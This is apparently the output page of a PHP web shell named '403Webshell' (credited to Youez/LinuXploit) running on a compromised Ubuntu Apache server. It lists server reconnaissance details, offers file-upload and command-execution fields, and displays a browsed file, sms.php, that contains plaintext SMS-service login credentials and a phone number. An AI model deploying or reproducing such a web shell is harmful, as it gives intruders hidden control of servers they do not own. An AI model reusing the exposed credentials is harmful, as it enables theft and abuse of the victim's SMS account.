403Webshell
Server IP : 45.94.215.241  /  Your IP : 216.73.216.122
Web Server : Apache/2.4.66 (Ubuntu)
System : Linux srv2937474766 7.0.0-28-generic #28-Ubuntu SMP PREEMPT_DYNAMIC Sun Jun 21 01:01:36 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/march/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/march/sms.php
<?php
define("SMS_PROVIDER_COMPANY","razpayamak");
define("SMS_SERVICE_ORGANIZATION","");
define("SMS_SERVICE_USERNAME","9022573600");
define("SMS_SERVICE_PASSWORD","DJ5BGO");
define("SMS_SERVICE_SOURCE_NO","50004000902257");
define("SMS_SERVICE_URL","https://rest.payamak-panel.com/api/SmartSMS/Send");

$message_destination = "09122736253";
$message_body = "تست";

$data = (
[
	"username" => SMS_SERVICE_USERNAME,
	"password" => SMS_SERVICE_PASSWORD,
	"from" => SMS_SERVICE_SOURCE_NO,
	"to" => $message_destination,
	"text" => $message_body
]);

$data = json_encode($data);
$client = curl_init(SMS_SERVICE_URL);
curl_setopt($client,CURLOPT_POST,1);
curl_setopt($client,CURLOPT_POSTFIELDS,$data);
curl_setopt($client, CURLOPT_RETURNTRANSFER, 1);
$response=curl_exec($client);
$result=json_decode($response,true);
print_r($response);
print_r($result);

Youez - 2016 - github.com/yon3zu
LinuXploit